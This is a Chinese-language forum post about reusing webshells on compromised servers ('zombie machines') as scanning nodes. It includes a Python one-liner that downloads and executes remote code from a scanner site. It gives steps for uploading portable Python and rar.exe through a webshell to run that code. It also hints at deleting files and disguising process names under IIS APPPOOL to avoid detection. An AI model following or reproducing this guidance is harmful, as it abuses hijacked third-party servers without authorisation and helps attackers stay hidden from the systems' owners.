webshell的另一用途

话说过个新年，人也懒了，好久没发帖了，上来看看号是不是被封了。。。。

言归正传，不知道大家都用不用www.yascanner.com，旧版是www.bugscan.net。挂载各种插件，不过扫描要添加在线引擎节点。

你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())" 来上线。

我这里要说的是，各位手里闲着的webshell也不少吧，何不把它们派上场？当然有人要问了，你以为每台肉鸡都有Python了？ 哈哈

好吧。这个问题我也困扰了半天，一度以为要来个自安装版或者什么t00ls专版by iframe呢。写了半天autoit了，才想起绿色版。


1.选个Python2.7.*的版本下载到本机执行安装，第一步选择Install just for me (not available on Windows Vista) （该步尤为重要！）

2.把一些帮助文档打钩去掉，能省就省。一顿next> finish。

3.把Python2.7文件夹打包，我这里选用winrar，因为体积很大，分卷压缩。4.选一个可写的角落，上传所有压缩包和winrar目录下的386K的rar.exe。

5.OK解压完了 开工。。。

等等，什么删除文件，更换一个有诱惑力的进程名，我这里就不多说了，当然肉鸡有python就更完美了。

webshell下让肉鸡执行IIS APPPOOL进程该起什么进程名，大家自己琢磨吧。


开扫


进程所属名问题，欢迎大家建议



听说上一篇文章作者抓鸡分分钟破百，不在话下，啧啧，这上线，这速度。

本文技术无任何含量，请勿拍砖。